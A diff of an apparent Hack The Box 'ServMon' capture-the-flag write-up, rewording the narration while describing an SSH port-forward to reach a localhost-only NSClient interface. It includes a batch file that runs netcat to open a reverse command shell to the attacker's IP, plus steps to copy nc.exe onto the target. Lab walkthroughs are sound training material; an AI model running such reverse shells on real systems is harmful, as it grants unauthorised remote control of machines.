chdav/hackthebox-writeups/machines/Windows/ServMon/README.md

 allowed hosts = 127.0.0.1
 ```

-To bypass this restriction, I'll make a tunnel using SSH and forward the port.
+To bypass this restriction, let's make a tunnel using SSH and forward the port.
 [Linuxize](https://linuxize.com/post/how-to-setup-ssh-tunneling/) provides a great write-up on this topic.
 Reconnecting with the following command should allow us to login in successfully.

 ```
 $ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
 ```

-Next, I navigate to `https://127.0.0.1:8443/` and attempt to login.
+Next, we'll navigate to `https://127.0.0.1:8443/` and attempt to login.
 Success!

 ![](images/nsclient-main.png)

 Unfortunately, the web application was too buggy and difficult to use without frustration, so I dug into the [documentation](https://docs.nsclient.org/api/rest/) for `NSClient` and decided to use `curl` commands to complete the exploit.

 The next step of the exploit requires a simple batch file for a reverse shell.
-I name mine `evil.bat`.
+Let's name it `evil.bat`.

 ```
 @echo off
 c:\temp\nc.exe 10.10.14.2 4444 -e cmd.exe
 ```

-Next, I need to get my batch file and `nc.exe` onto _ServMon_.
-There a few different means to do that, but since I already have an SSH login, I will use SCP, or secure copy.
+Next, we need to get my batch file and `nc.exe` onto _ServMon_.
+There a few different means to do that, but since we already have an SSH login, we'll use SCP, or secure copy.

 ```
 $ cp /usr/share/windows-resources/binaries/nc.exe .